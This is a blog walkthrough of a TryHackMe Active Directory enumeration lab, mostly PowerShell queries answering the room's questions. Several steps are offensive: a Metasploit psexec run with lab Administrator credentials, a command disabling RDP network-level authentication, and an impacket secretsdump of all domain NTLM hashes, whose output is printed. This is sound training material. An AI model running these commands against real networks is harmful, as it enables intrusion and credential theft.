Enumerating Active Directory TryHackMe Walkthrough

Rich
6 min readFeb 5, 2024

--

TL;DR Walkthrough of the Enumerating Active Directory TryHackme room.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

Much like the Breaching Active Directory room that preceded this one, I did not really follow the methodology that the room suggested. After enumerating and poking around the Breaching AD room I realized that it looked like THM was using very similar configurations in all the rooms in their Red Team Pathway’s AD Series. The Pentest+ pathway included some of these rooms as well.

Spoiler alert: Readers will recall that we grabbed the mscache of the Administrator@za.tryhackme.com off one of the domain systems that we used in the Breaching AD room. I peeked ahead at the Persisting AD room, added some information from there to my wordlist, and cracked the hash.

Hence I simply connected to THMDC in this room as the Administrator and then answered the questions. If you want to follow along in the spirit of the room then go through the steps of requesting creds as THM outlined.

I also used PowerShell for almost the entire room, and had found some of the answers while enumerating in the Breaching AD room.

That said, let’s get to how to query and find the answers.

Connecting

Some of these THM VMs are really fragile, or they put a really odd config in them. I could not simply WinRM to the DC.

evil-winrm -i 10.200.18.101 -u Administrator -p tryhackmewouldnotguess1@

Hence I used PSExec to go in and disable NLA.

msfconsole
use exploit/windows/smb/psexec
set LHOST 10.50.16.49
set RHOST 10.200.18.201
set SMBUser Administrator
set SMBPass tryhackmewouldnotguess1@
set SMBDomain za.tryhackme.com
run
shell
PowerShell

#Disable NLA
$TargetMachine = $env:COMPUTERNAME ;
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetMachine -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

I could then RDP into THMDC, pull up PowerShell_ISE, and find all the answers for this room.

xfreerdp /v:10.200.18.101 /u:Administrator /p:tryhackmewouldnotguess1@ /dynamic-resolution

— — Task 2 — -

What native Windows binary allows us to inject credentials legitimately into memory?

RunAs.exe

What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

/netonly

What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

SYSVOL

When performing dir \\za.tryhackme.com\SYSVOL, what type of authentication is performed by default?

Kerberos authentication

— — Task 3 — -

How many Computer objects are part of the Servers OU?

I started by querying all the OU names, then getting a count of the specific one THM wanted.

(Get-ADOrganizationalUnit -Filter *).Name

(Get-ADOrganizationalUnit -Filter {Name -eq "Servers"}).Count

2

How many Computer objects are part of the Workstations OU?

(Get-ADOrganizationalUnit -Filter {Name -eq “Workstations”}).Count

2

How many departments (Organizational Units) does this organization consist of?

It’s a poorly worded question. What they are trying to ask is how many OUs are inside the People OU. I had to use their hint to realize that’s what they meant.

$Searchbase = (Get-ADOrganizationalUnit -Filter {Name -eq "People"}).DistinguishedName
(Get-ADOrganizationalUnit -Filter * -SearchBase $Searchbase).Count

8

How many Admin tiers does this organisation have?

(Get-ADOrganizationalUnit -Filter {Name -like “T*”}).DistinguishedName.Count

3

What is the value of the flag stored in the description attribute of the t0_tinus.green account?

(Get-ADUser t0_tinus.green -Properties *).Description

THM{Enumerating.Via.MMC}

— — Task 4 — -

Apart from the Domain Users group, what other group is the aaron.harris account a member of?

(Get-ADUser aaron.harris -Properties *).MemberOf

CN=Internet Access,OU=Groups,DC=za,DC=tryhackme,DC=com

Is the Guest account active? (Yay,Nay)

(Get-ADUser Guest -Properties *).Enabled

Nay

How many accounts are a member of the Tier 1 Admins group?

(Get-ADGroupMember “Tier 1 Admins”).Count

7

What is the account lockout duration of the current password policy in minutes?

#Query borrowed from The Scripting Guy
#https://devblogs.microsoft.com/scripting/use-powershell-to-get-account-lockout-and-password-policy/

$RootDSE = Get-ADRootDSE -Server THMDC
$AccountPolicy = Get-ADObject $RootDSE.defaultNamingContext -Property lockoutDuration, lockoutObservationWindow, lockoutThreshold
$AccountPolicy | Select @{n="PolicyType";e={"Account Lockout"}},`
DistinguishedName,`
@{n="lockoutDuration";e={"$($_.lockoutDuration / -600000000) minutes"}},`
@{n="lockoutObservationWindow";e={"$($_.lockoutObservationWindow / -600000000) minutes"}},`
lockoutThreshold | Format-List

30

Alternate query using legacy cmd.exe command:

net account /domain

I’m probably preaching the choir, but while there are a couple legacy cmd.exe commands that remain easy to use to this day such as ‘netdom query fsmo’, the problem with these legacy commands is that they return strings. This of course means that it’s not simple to capture a specific thing in the query results, set a variable to it, and then continue using it inside a longer, more complex query.

— — Task 5 — -

What is the value of the Title attribute of Beth Nolan (beth.nolan)?

(Get-ADUser beth.nolan -Properties *).Title

Senior

What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

(Get-ADUser annette.manning).DistinguishedName

CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

When was the Tier 2 Admins group created?

Get-ADGroup “Tier 2 Admins” -Properties * | Select-Object Created

2/24/2022 10:04:41 PM

What is the value of the SID attribute of the Enterprise Admins group?

(Get-ADGroup “Enterprise Admins” -Properties *).SID.Value

S-1–5–21–3330634377–1326264276–632209373–519

Which container is used to store deleted AD objects?

(Get-ADDomain).DeletedObjectsContainer

CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

— — Task 6 — -

I setup Neo4j and BloodHound on a Win10 VM in the home lab awhile back. It comes in handy for stuff like this. One simply uploads SharpHound from Kali, runs it, downloads the resulting Zip file, drop it into the Win10 VM, and analyzes in BloodHound.

Our howto for setting up BloodHound is here.

On a sidenote, we ran a 16 part series on Auditing AD that also included 7 annexes. The summary is here.

I learned a TON, I developed Red Team & Blue Team tools along the way, but at the end of it all I had to admit [quoting from here]:

“I really have to say that BloodHound and PowerView simply do an excellent job at this ‘out of the box’. If you want to gain a deeper understanding of the topic then do what we did. If you just want to check for ‘Dangerous Rights’ then use BloodHound and/or PowerView.”

What command can be used to execute Sharphound.exe and request that it recovers Session information only from the za.tryhackme.com domain without touching domain controllers?

SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

4

How many machines do members of the Tier 1 Admins group have administrative access to?

2

How many users are members of the Tier 2 Admins group?

15

Summary

On a sidenote, I used secretsdump to save the NTLM hashes for all the users in this AD. Based on what I have seen in the Breaching Active Directory and Enumerating Active Directory rooms I am guessing we will see these get used again.

python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc-ntlm az/administrator@10.200.18.101 >> /home/kali/Downloads/Pilfered/BreachingAD/allhashes.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeda8b62fd15a38022aaeffd6757c677:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:383c73648c78df945f9afab49b4c5aa2:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e96eab5f240174fe2754efc94f6a53ae:::

za.tryhackme.com\t0_tinus.green:4105:aad3b435b51404eeaad3b435b51404ee:dfca59dbc2a400d6ba1e26f2fb19bb7d:::

Overall this was another good room. I’ll get into the rest of the rooms in this series when I’m not busy suffering through college and their theories.

References

Get AD account lockout duration: https://devblogs.microsoft.com/scripting/use-powershell-to-get-account-lockout-and-password-policy/

--

--

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.